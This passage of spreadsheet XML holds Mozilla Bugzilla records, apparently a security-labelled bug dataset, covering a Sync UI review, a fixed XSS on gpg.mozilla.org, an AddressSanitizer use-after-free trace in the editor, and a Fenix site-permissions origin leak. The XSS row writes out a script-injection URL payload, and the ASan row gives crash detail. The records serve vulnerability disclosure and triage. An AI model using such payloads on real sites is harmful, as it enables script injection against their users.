          <t>2018-09-24 14:26:41 -0700</t>
        </is>
      </c>
      <c r="E1038" t="n">
        <v>1</v>
      </c>
      <c r="F1038" t="n">
        <v>1</v>
      </c>
      <c r="G1038" t="n">
        <v>2</v>
      </c>
      <c r="H1038" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1038" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J1038" t="inlineStr">
        <is>
          <t>Sync</t>
        </is>
      </c>
      <c r="K1038" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1038" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1038" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1038" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1038" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1038" t="inlineStr"/>
      <c r="Q1038" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1038" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1038" t="inlineStr">
        <is>
          <t>1.0 beta3</t>
        </is>
      </c>
      <c r="T1038" t="n">
        <v>1</v>
      </c>
      <c r="U1038" t="n">
        <v>0</v>
      </c>
      <c r="V1038" t="n">
        <v>5</v>
      </c>
      <c r="W1038" t="inlineStr">
        <is>
          <t>Notes from UI review:
* Make the default (merge) bigger and the other two smaller?
* We need better labels for the buttons.
* For Option 2 (wipe local), show what local data will be deleted
* For Option 3, there isn't too much we can do since we don't have a server API that shows how much data is in the server etc. But show them the names of the other machines at least.
* We also need some way to tell users that they are making a choice for just one time for setup, and after that the regular behavior is to merge.</t>
        </is>
      </c>
      <c r="X1038" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1039">
      <c r="A1039" t="n">
        <v>952077</v>
      </c>
      <c r="B1039" t="inlineStr">
        <is>
          <t>2013-12-19 04:32:05 -0800</t>
        </is>
      </c>
      <c r="C1039" t="inlineStr">
        <is>
          <t>XSS on gpg.mozilla.org</t>
        </is>
      </c>
      <c r="D1039" t="inlineStr">
        <is>
          <t>2024-05-30 08:31:19 -0700</t>
        </is>
      </c>
      <c r="E1039" t="n">
        <v>1</v>
      </c>
      <c r="F1039" t="n">
        <v>1</v>
      </c>
      <c r="G1039" t="n">
        <v>2</v>
      </c>
      <c r="H1039" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1039" t="inlineStr">
        <is>
          <t>Cloud Services</t>
        </is>
      </c>
      <c r="J1039" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1039" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1039" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1039" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1039" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1039" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1039" t="inlineStr">
        <is>
          <t>[site:gpg.mozilla.org][reporter-external] old IE only?</t>
        </is>
      </c>
      <c r="Q1039" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1039" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1039" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1039" t="n">
        <v>1</v>
      </c>
      <c r="U1039" t="n">
        <v>0</v>
      </c>
      <c r="V1039" t="n">
        <v>15</v>
      </c>
      <c r="W1039" t="inlineStr">
        <is>
          <t>Created attachment 8350003
mozzila.png
User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0 (Beta/Release)
Build ID: 20131112160018
Steps to reproduce:
Scanned subdomains of mozilla.org
Found about gpg.mozilla.org
Actual results:
Scanned it and found xss on /pks/lookup/undefined1&lt;ScRiPt&gt;prompt(972363)&lt;/ScRiPt&gt;
Expected results:
Screen PopupAlert</t>
        </is>
      </c>
      <c r="X1039" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1040">
      <c r="A1040" t="n">
        <v>788950</v>
      </c>
      <c r="B1040" t="inlineStr">
        <is>
          <t>2012-09-05 22:49:45 -0700</t>
        </is>
      </c>
      <c r="C1040" t="inlineStr">
        <is>
          <t>Heap-use-after-free in nsTextEditRules::WillInsert</t>
        </is>
      </c>
      <c r="D1040" t="inlineStr">
        <is>
          <t>2024-05-30 07:33:00 -0700</t>
        </is>
      </c>
      <c r="E1040" t="n">
        <v>1</v>
      </c>
      <c r="F1040" t="n">
        <v>1</v>
      </c>
      <c r="G1040" t="n">
        <v>3</v>
      </c>
      <c r="H1040" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1040" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1040" t="inlineStr">
        <is>
          <t>DOM: Editor</t>
        </is>
      </c>
      <c r="K1040" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1040" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1040" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1040" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1040" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1040" t="inlineStr">
        <is>
          <t>[asan][advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q1040" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1040" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1040" t="inlineStr">
        <is>
          <t>mozilla18</t>
        </is>
      </c>
      <c r="T1040" t="n">
        <v>1</v>
      </c>
      <c r="U1040" t="n">
        <v>0</v>
      </c>
      <c r="V1040" t="n">
        <v>19</v>
      </c>
      <c r="W1040" t="inlineStr">
        <is>
          <t>Reproduces on trunk, testcase coming.
=================================================================
==8725== ERROR: AddressSanitizer heap-use-after-free on address 0x7fc077a478c8 at pc 0x7fc0968060e3 bp 0x7fffd39b4db0 sp 0x7fffd39b4da8
READ of size 8 at 0x7fc077a478c8 thread T0
    #0 0x7fc0968060e2 in nsCOMPtr_base::assign_assuming_AddRef(nsISupports*) src/../../../dist/include/nsCOMPtr.h:435
    #1 0x7fc0a2fbef23 in nsCOMPtr_base::assign_with_AddRef(nsISupports*) src/objdir-ff-asan-sym/xpcom/build/nsCOMPtr.cpp:49
    #2 0x7fc09833dd72 in nsCOMPtr&lt;nsIDOMNode&gt;::operator=(nsIDOMNode*) src/../../../dist/include/nsCOMPtr.h:622
    #3 0x7fc09c964e46 in nsTextEditRules::WillInsert(nsISelection*, bool*) src/editor/libeditor/text/nsTextEditRules.cpp:327
    #4 0x7fc09d002775 in nsHTMLEditRules::WillInsert(nsISelection*, bool*) src/editor/libeditor/html/nsHTMLEditRules.cpp:1187
    #5 0x7fc09cfb5e12 in nsHTMLEditRules::WillDoAction(mozilla::Selection*, nsRulesInfo*, bool*, bool*) src/editor/libeditor/html/nsHTMLEditRules.cpp:618
    #6 0x7fc09ce3358b in nsHTMLEditor::DoInsertHTMLWithContext(nsAString_internal const&amp;, nsAString_internal const&amp;, nsAString_internal const&amp;, nsAString_internal const&amp;, nsIDOMDocument*, nsIDOMNode*, int, bool, bool) src/editor/libeditor/html/nsHTMLDataTransfer.cpp:391
    #7 0x7fc09ce2eb7e in nsHTMLEditor::InsertHTMLWithContext(nsAString_internal const&amp;, nsAString_internal const&amp;, nsAString_internal const&amp;, nsAString_internal const&amp;, nsIDOMDocument*, nsIDOMNode*, int, bool) src/editor/libeditor/html/nsHTMLDataTransfer.cpp:229
    #8 0x7fc09ce2e42c in nsHTMLEditor::InsertHTML(nsAString_internal const&amp;) src/editor/libeditor/html/nsHTMLDataTransfer.cpp:214
    #9 0x7fc09ce2e4ee in non-virtual thunk to nsHTMLEditor::InsertHTML(nsAString_internal const&amp;) src/gfx/cairo/cairo/src/cairo-surface-subsurface.c:0
    #10 0x7fc0a04c52d9 in nsInsertHTMLCommand::DoCommandParams(char const*, nsICommandParams*, nsISupports*) src/editor/composer/src/nsComposerCommands.cpp:1335
    #11 0x7fc09fd13f91 in nsControllerCommandTable::DoCommandParams(char const*, nsICommandParams*, nsISupports*) src/embedding/components/commandhandler/src/nsControllerCommandTable.cpp:175
    #12 0x7fc09fce7262 in nsBaseCommandController::DoCommandWithParams(char const*, nsICommandParams*) src/embedding/components/commandhandler/src/nsBaseCommandController.cpp:153
    #13 0x7fc09fce7536 in non-virtual thunk to nsBaseCommandController::DoCommandWithParams(char const*, nsICommandParams*) src/gfx/cairo/cairo/src/cairo-surface-subsurface.c:0
    #14 0x7fc09fcfdb4f in nsCommandManager::DoCommand(char const*, nsICommandParams*, nsIDOMWindow*) src/embedding/components/commandhandler/src/nsCommandManager.cpp:234
    #15 0x7fc09b2a7418 in nsHTMLDocument::ExecCommand(nsAString_internal const&amp;, bool, nsAString_internal const&amp;, bool*) src/content/html/document/src/nsHTMLDocument.cpp:3232
    #16 0x7fc09b2a8d6d in non-virtual thunk to nsHTMLDocument::ExecCommand(nsAString_internal const&amp;, bool, nsAString_internal const&amp;, bool*) src/gfx/cairo/cairo/src/cairo-surface-subsurface.c:0
    #17 0x7fc0a345e807 in NS_InvokeByIndex_P src/xpcom/reflect/xptcall/src/md/unix/xptcinvoke_x86_64_unix.cpp:162
    #18 0x7fc09e8bae7e in CallMethodHelper::Invoke() src/js/xpconnect/src/XPCWrappedNative.cpp:3105
    #19 0x7fc09e91d995 in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) src/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:1470
    #20 0x7fc0a9a40051 in js::CallJSNative(JSContext*, int (*)(JSContext*, unsigned int, JS::Value*), JS::CallArgs const&amp;) src/js/src/jscntxtinlines.h:372
    #21 0x7fc0a99cd281 in js::Interpret(JSContext*, js::StackFrame*, js::InterpMode) src/js/src/jsinterp.cpp:2405
    #22 0x7fc0a99342c2 in js::RunScript(JSContext*, JSScript*, js::StackFrame*) src/js/src/jsinterp.cpp:301
    #23 0x7fc0a9a4d386 in js::ExecuteKernel(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value const&amp;, js::ExecuteType, js::StackFrame*, JS::Value*) src/js/src/jsinterp.cpp:486
    #24 0x7fc0a9a4f33e in js::Execute(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value*) src/js/src/jsinterp.cpp:523
    #25 0x7fc0a91a14b4 in JS::Evaluate(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CompileOptions, unsigned short const*, unsigned long, JS::Value*) src/js/src/jsapi.cpp:5702
    #26 0x7fc09ba3f85d in nsJSContext::EvaluateString(nsAString_internal const&amp;, JSObject*, nsIPrincipal*, nsIPrincipal*, char const*, unsigned int, JSVersion, nsAString_internal*, bool*) src/dom/base/nsJSEnvironment.cpp:1499
    #27 0x7fc09bbef6cf in nsGlobalWindow::RunTimeoutHandler(nsTimeout*, nsIScriptContext*) src/dom/base/nsGlobalWindow.cpp:9590
    #28 0x7fc09bba7049 in nsGlobalWindow::RunTimeout(nsTimeout*) src/dom/base/nsGlobalWindow.cpp:9851
    #29 0x7fc09bbed72a in nsGlobalWindow::TimerCallback(nsITimer*, void*) src/dom/base/nsGlobalWindow.cpp:10118
    #30 0x7fc0a33a0af2 in nsTimerImpl::Fire() src/xpcom/threads/nsTimerImpl.cpp:473
    #31 0x7fc0a33a23a8 in nsTimerEvent::Run() src/xpcom/threads/nsTimerImpl.cpp:556
    #32 0x7fc0a336578e in nsThread::ProcessNextEvent(bool, bool*) src/xpcom/threads/nsThread.cpp:624
    #33 0x7fc0a3006b67 in NS_ProcessNextEvent_P(nsIThread*, bool) src/objdir-ff-asan-sym/xpcom/build/nsThreadUtils.cpp:220
    #34 0x7fc0a1dc3625 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) src/ipc/glue/MessagePump.cpp:82
    #35 0x7fc0a3610389 in MessageLoop::RunInternal() src/ipc/chromium/src/base/message_loop.cc:208
    #36 0x7fc0a36101d2 in MessageLoop::RunHandler() src/ipc/chromium/src/base/message_loop.cc:201
    #37 0x7fc0a36100b7 in MessageLoop::Run() src/ipc/chromium/src/base/message_loop.cc:175
    #38 0x7fc0a12884ce in nsBaseAppShell::Run() src/widget/xpwidgets/nsBaseAppShell.cpp:163
    #39 0x7fc09fee89b8 in nsAppStartup::Run() src/toolkit/components/startup/nsAppStartup.cpp:273
    #40 0x7fc0966e81a0 in XREMain::XRE_mainRun() src/toolkit/xre/nsAppRunner.cpp:3835
    #41 0x7fc0966ee414 in XREMain::XRE_main(int, char**, nsXREAppData const*) src/toolkit/xre/nsAppRunner.cpp:3912
    #42 0x7fc0966f14de in XRE_main src/toolkit/xre/nsAppRunner.cpp:3988
    #43 0x40c5bb in do_main(int, char**) src/browser/app/nsBrowserApp.cpp:174
    #44 0x409e1f in main src/browser/app/nsBrowserApp.cpp:279
    #45 0x7fc0b322bc4d in ?? ??:0
0x7fc077a478c8 is located 72 bytes inside of 1096-byte region [0x7fc077a47880,0x7fc077a47cc8)
freed by thread T0 here:
    #0 0x4c3e30 in free ??:0
    #1 0x7fc0b00c9572 in moz_free src/memory/mozalloc/mozalloc.cpp:51
    #2 0x7fc09cf911c5 in operator delete(void*) src/../../../dist/include/mozilla/mozalloc.h:224
    #3 0x7fc09c94e627 in nsTextEditRules::Release() src/editor/libeditor/text/nsTextEditRules.cpp:93
    #4 0x7fc09cf918d3 in nsHTMLEditRules::Release() src/editor/libeditor/html/nsHTMLEditRules.cpp:220
    #5 0x7fc096806070 in nsCOMPtr_base::assign_assuming_AddRef(nsISupports*) src/../../dist/include/nsCOMPtr.h:440
    #6 0x7fc0a2fbef23 in nsCOMPtr_base::assign_with_AddRef(nsISupports*) src/objdir-ff-asan-sym/xpcom/build/nsCOMPtr.cpp:49
    #7 0x7fc09c917a42 in nsCOMPtr&lt;nsIEditRules&gt;::operator=(nsIEditRules*) src/../../../dist/include/nsCOMPtr.h:622
    #8 0x7fc09cea5c29 in nsHTMLEditor::InitRules() src/editor/libeditor/html/nsHTMLEditor.cpp:488
    #9 0x7fc09c91a35f in nsPlaintextEditor::EndEditorInit() src/editor/libeditor/text/nsPlaintextEditor.cpp:200
    #10 0x7fc09c94ba3d in ~nsAutoEditInitRulesTrigger src/editor/libeditor/text/nsTextEditUtils.cpp:94
    #11 0x7fc09cea0e60 in nsHTMLEditor::Init(nsIDOMDocument*, nsIContent*, nsISelectionController*, unsigned int) src/editor/libeditor/html/nsHTMLEditor.cpp:289
    #12 0x7fc0a04f6b0e in nsEditingSession::SetupEditorOnWindow(nsIDOMWindow*) src/editor/composer/src/nsEditingSession.cpp:460
    #13 0x7fc0a04ec567 in nsEditingSession::MakeWindowEditable(nsIDOMWindow*, char const*, bool, bool, bool) src/editor/composer/src/nsEditingSession.cpp:173
    #14 0x7fc09b277320 in nsHTMLDocument::EditingStateChanged() src/content/html/document/src/nsHTMLDocument.cpp:2693
    #15 0x7fc09b274859 in nsHTMLDocument::BeginLoad() src/content/html/document/src/nsHTMLDocument.cpp:880
    #16 0x7fc09cd0ac82 in nsHtml5TreeOpExecutor::WillBuildModel(nsDTDMode) src/parser/html/nsHtml5TreeOpExecutor.cpp:116
    #17 0x7fc09cafcd0b in nsHtml5Parser::Parse(nsAString_internal const&amp;, void*, nsACString_internal const&amp;, bool, nsDTDMode) src/parser/html/nsHtml5Parser.cpp:231
    #18 0x7fc09b28eb20 in nsHTMLDocument::WriteCommon(JSContext*, nsAString_internal const&amp;, bool) src/content/html/document/src/nsHTMLDocument.cpp:1736
    #19 0x7fc09b28fa95 in nsHTMLDocument::Write(nsAString_internal const&amp;, JSContext*) src/content/html/document/src/nsHTMLDocument.cpp:1749
    #20 0x7fc09eb0f571 in nsIDOMHTMLDocument_Write(JSContext*, unsigned int, JS::Value*) src/objdir-ff-asan-sym/js/xpconnect/src/dom_quickstubs.cpp:13713
    #21 0x7fc0a9a40051 in js::CallJSNative(JSContext*, int (*)(JSContext*, unsigned int, JS::Value*), JS::CallArgs const&amp;) src/js/src/jscntxtinlines.h:372
    #22 0x7fc0a92d143c in js::Invoke(JSContext*, js::InvokeArgsGuard&amp;, js::MaybeConstruct) src/js/src/jsinterp.h:119
    #23 0x7fc0a9a45a0b in js::Invoke(JSContext*, JS::Value const&amp;, JS::Value const&amp;, unsigned int, JS::Value*, JS::Value*) src/js/src/jsinterp.cpp:388
    #24 0x7fc0a9eb7877 in js::IndirectProxyHandler::call(JSContext*, JSObject*, unsigned int, JS::Value*) src/js/src/jsproxy.cpp:451
    #25 0x7fc0aa6d01c0 in js::DirectWrapper::call(JSContext*, JSObject*, unsigned int, JS::Value*) src/js/src/jswrapper.cpp:316
    #26 0x7fc0aa6e1385 in js::CrossCompartmentWrapper::call(JSContext*, JSObject*, unsigned int, JS::Value*) src/js/src/jswrapper.cpp:648
    #27 0x7fc0aa6e1a54 in non-virtual thunk to js::CrossCompartmentWrapper::call(JSContext*, JSObject*, unsigned int, JS::Value*) ??:0
    #28 0x7fc0a9f428bd in js::Proxy::call(JSContext*, JSObject*, unsigned int, JS::Value*) src/js/src/jsproxy.cpp:2457
    #29 0x7fc0a9f5cbcd in proxy_Call(JSContext*, unsigned int, JS::Value*) src/js/src/jsproxy.cpp:2990
previously allocated by thread T0 here:
    #0 0x4c3ef0 in __interceptor_malloc ??:0
    #1 0x7fc0b00c96c6 in moz_xmalloc src/memory/mozalloc/mozalloc.cpp:57
    #2 0x7fc09cea5c0a in operator new(unsigned long) src/../../../dist/include/mozilla/mozalloc.h:200
    #3 0x7fc09c91a35f in nsPlaintextEditor::EndEditorInit() src/editor/libeditor/text/nsPlaintextEditor.cpp:200
    #4 0x7fc09c94ba3d in ~nsAutoEditInitRulesTrigger src/editor/libeditor/text/nsTextEditUtils.cpp:94
    #5 0x7fc09cea0e60 in nsHTMLEditor::Init(nsIDOMDocument*, nsIContent*, nsISelectionController*, unsigned int) src/editor/libeditor/html/nsHTMLEditor.cpp:289
    #6 0x7fc0a04f6b0e in nsEditingSession::SetupEditorOnWindow(nsIDOMWindow*) src/editor/composer/src/nsEditingSession.cpp:460
    #7 0x7fc0a04ec567 in nsEditingSession::MakeWindowEditable(nsIDOMWindow*, char const*, bool, bool, bool) src/editor/composer/src/nsEditingSession.cpp:173
    #8 0x7fc09b277320 in nsHTMLDocument::EditingStateChanged() src/content/html/document/src/nsHTMLDocument.cpp:2693
    #9 0x7fc09b29ad34 in nsHTMLDocument::MaybeEditingStateChanged() src/content/html/document/src/nsHTMLDocument.cpp:2339
    #10 0x7fc09b29b4e5 in nsHTMLDocument::EndUpdate(unsigned int) src/content/html/document/src/nsHTMLDocument.cpp:2352
    #11 0x7fc09cd0c35e in nsHtml5TreeOpExecutor::EndDocUpdate() src/parser/html/nsHtml5TreeOpExecutor.h:248
    #12 0x7fc09cd0b9a4 in nsHtml5TreeOpExecutor::DidBuildModel(bool) src/parser/html/nsHtml5TreeOpExecutor.cpp:131
    #13 0x7fc09ccf736a in nsHtml5TreeOperation::Perform(nsHtml5TreeOpExecutor*, nsIContent**) src/parser/html/nsHtml5TreeOperation.cpp:627
    #14 0x7fc09cd0fd9a in nsHtml5TreeOpExecutor::RunFlushLoop() src/parser/html/nsHtml5TreeOpExecutor.cpp:564
    #15 0x7fc09cd4a905 in nsHtml5ExecutorFlusher::Run() src/parser/html/nsHtml5StreamParser.cpp:127
    #16 0x7fc0a336578e in nsThread::ProcessNextEvent(bool, bool*) src/xpcom/threads/nsThread.cpp:624
    #17 0x7fc0a3006b67 in NS_ProcessNextEvent_P(nsIThread*, bool) src/objdir-ff-asan-sym/xpcom/build/nsThreadUtils.cpp:220
    #18 0x7fc0a1dc3625 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) src/ipc/glue/MessagePump.cpp:82
    #19 0x7fc0a3610389 in MessageLoop::RunInternal() src/ipc/chromium/src/base/message_loop.cc:208
    #20 0x7fc0a36101d2 in MessageLoop::RunHandler() src/ipc/chromium/src/base/message_loop.cc:201
    #21 0x7fc0a36100b7 in MessageLoop::Run() src/ipc/chromium/src/base/message_loop.cc:175
    #22 0x7fc0a12884ce in nsBaseAppShell::Run() src/widget/xpwidgets/nsBaseAppShell.cpp:163
    #23 0x7fc09fee89b8 in nsAppStartup::Run() src/toolkit/components/startup/nsAppStartup.cpp:273
    #24 0x7fc0966e81a1 in XREMain::XRE_mainRun() src/toolkit/xre/nsAppRunner.cpp:3835
Shadow byte and word:
  0x1ff80ef48f19: fd
  0x1ff80ef48f18: fd fd fd fd fd fd fd fd
More shadow bytes:
  0x1ff80ef48ef8: fa fa fa fa fa fa fa fa
  0x1ff80ef48f00: fa fa fa fa fa fa fa fa
  0x1ff80ef48f08: fa fa fa fa fa fa fa fa
  0x1ff80ef48f10: fd fd fd fd fd fd fd fd
=&gt;0x1ff80ef48f18: fd fd fd fd fd fd fd fd
  0x1ff80ef48f20: fd fd fd fd fd fd fd fd
  0x1ff80ef48f28: fd fd fd fd fd fd fd fd
  0x1ff80ef48f30: fd fd fd fd fd fd fd fd
  0x1ff80ef48f38: fd fd fd fd fd fd fd fd
Stats: 228M malloced (246M for red zones) by 405498 calls
Stats: 43M realloced by 15549 calls
Stats: 200M freed by 193168 calls
Stats: 64M really freed by 120477 calls
Stats: 432M (110668 full pages) mmaped in 108 calls
  mmaps   by size class: 8:245745; 9:40955; 10:16380; 11:16376; 12:2048; 13:1536; 14:1280; 15:256; 16:320; 17:1280; 18:144; 19:40; 20:20;
  mallocs by size class: 8:317776; 9:46531; 10:16128; 11:17241; 12:2334; 13:1738; 14:1479; 15:332; 16:400; 17:1309; 18:172; 19:41; 20:17;
  frees   by size class: 8:121716; 9:37588; 10:13105; 11:14230; 12:1542; 13:1565; 14:1305; 15:291; 16:328; 17:1296; 18:150; 19:38; 20:14;
  rfrees  by size class: 8:80367; 9:20243; 10:8280; 11:9424; 12:628; 13:487; 14:388; 15:151; 16:188; 17:287; 18:28; 19:5; 20:1;
Stats: malloc large: 1539 small slow: 1896
==8725== ABORTING</t>
        </is>
      </c>
      <c r="X1040" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1041">
      <c r="A1041" t="n">
        <v>525049</v>
      </c>
      <c r="B1041" t="inlineStr">
        <is>
          <t>2009-10-28 12:46:47 -0700</t>
        </is>
      </c>
      <c r="C1041" t="inlineStr">
        <is>
          <t>Docs for using Bespin Embedded</t>
        </is>
      </c>
      <c r="D1041" t="inlineStr">
        <is>
          <t>2009-11-13 06:11:44 -0800</t>
        </is>
      </c>
      <c r="E1041" t="n">
        <v>1</v>
      </c>
      <c r="F1041" t="n">
        <v>1</v>
      </c>
      <c r="G1041" t="n">
        <v>6</v>
      </c>
      <c r="H1041" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1041" t="inlineStr">
        <is>
          <t>Skywriter Graveyard</t>
        </is>
      </c>
      <c r="J1041" t="inlineStr">
        <is>
          <t>Documentation</t>
        </is>
      </c>
      <c r="K1041" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1041" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M1041" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="N1041" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1041" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1041" t="inlineStr"/>
      <c r="Q1041" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1041" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1041" t="inlineStr">
        <is>
          <t>0.5</t>
        </is>
      </c>
      <c r="T1041" t="n">
        <v>1</v>
      </c>
      <c r="U1041" t="n">
        <v>0</v>
      </c>
      <c r="V1041" t="n">
        <v>2</v>
      </c>
      <c r="W1041" t="inlineStr">
        <is>
          <t>Make sure the docs are complete and accurate.</t>
        </is>
      </c>
      <c r="X1041" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1042">
      <c r="A1042" t="n">
        <v>1713638</v>
      </c>
      <c r="B1042" t="inlineStr">
        <is>
          <t>2021-05-31 08:48:10 -0700</t>
        </is>
      </c>
      <c r="C1042" t="inlineStr">
        <is>
          <t>The site permissions feature is leaking permissions to sites with the same scheme/port.</t>
        </is>
      </c>
      <c r="D1042" t="inlineStr">
        <is>
          <t>2022-11-03 23:26:13 -0700</t>
        </is>
      </c>
      <c r="E1042" t="n">
        <v>1</v>
      </c>
      <c r="F1042" t="n">
        <v>1</v>
      </c>
      <c r="G1042" t="n">
        <v>2</v>
      </c>
      <c r="H1042" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1042" t="inlineStr">
        <is>
          <t>Fenix</t>
        </is>
      </c>
      <c r="J1042" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1042" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1042" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1042" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N1042" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1042" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1042" t="inlineStr">
        <is>
          <t>[adv-main90+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q1042" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1042" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S1042" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1042" t="n">
        <v>1</v>
      </c>
      <c r="U1042" t="n">
        <v>0</v>
      </c>
      <c r="V1042" t="n">
        <v>20</v>
      </c>
      <c r="W1042" t="inlineStr">
        <is>
          <t>Created attachment 9224322
db_permissions_example.png
Reading over the weekend about Origin, origin attributes and principals, I noticed there is a security gap on my implementation of site permissions, [I'm storing only the host name](https://github.com/mozilla-mobile/android-components/blob/83b60ae0cd3c01047dfabda93156733814c771a1/components/feature/sitepermissions/src/main/java/mozilla/components/feature/sitepermissions/SitePermissionsFeature.kt#L164) (see the attachment db_permissions_example.png), instead of the [origin (Schema + host + port) ](https://datatracker.ietf.org/doc/html/rfc6454#section-3.2) on the Site permissions DB, causing that sites under different  **schema and port but with the same host share the same permission with each other**, for example:
   https://example.com/
   http://example.com:8080/
   https://example.com:4343/
Based on the rules of same [origin](https://datatracker.ietf.org/doc/html/rfc6454#section-3.2),  these three sites, should be treated as completely different sites, but in my implementation as I'm only storing the host, all of the three will shared permissions between each other.
For example, an user navigates to https://example.com/ and grants location permission, this will cause that  http://example.com:8080/ and https://example.com:4343/ will also have the location permission granted. 
In 91, we are expecting to land a [patch](https://bugzilla.mozilla.org/show_bug.cgi?id=1699480) that will migrate AC site permissions db to geckoView storage ( that will store site permissions based on principals) , but this will only cover Content permission media permission (Camera and microphone) are still going to be stored on AC see https://bugzilla.mozilla.org/show_bug.cgi?id=1712756.
We would like the security team to assess the severity of the issue to see the steps to follow.
Thanks in advance, and sorry for all the trouble.</t>
        </is>
      </c>
      <c r="X1042" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1043">
      <c r="A1043" t="n">
        <v>1414839</v>
      </c>
      <c r="B1043" t="inlineStr">
        <is>
          <t>2017-11-06 07:24:36 -0800</t>
        </is>
      </c>
      <c r="C1043" t="inlineStr">
        <is>
          <t>Provide public dataset for SSL adoption in Firefox release</t>
        </is>
      </c>
      <c r="D1043" t="inlineStr">
        <is>
          <t>2022-07-26 12:18:12 -0700</t>
        </is>
      </c>
      <c r="E1043" t="n">
        <v>1</v>
      </c>
      <c r="F1043" t="n">
        <v>1</v>
      </c>
      <c r="G1043" t="n">
        <v>2</v>
      </c>
      <c r="H1043" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1043" t="inlineStr">
        <is>
          <t>Data Platform and Tools</t>
        </is>
      </c>
      <c r="J1043" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1043" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1043" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1043" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1043" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1043" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1043" t="inlineStr">
        <is>
          <t>[measurement:client]</t>
        </is>
      </c>
      <c r="Q1043" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1043" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1043" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1043" t="n">
        <v>1</v>
      </c>
      <c r="U1043" t="n">
        <v>0</v>
      </c>
      <c r="V1043" t="n">
        <v>43</v>
      </c>
      <c r="W1043" t="inlineStr">
        <is>
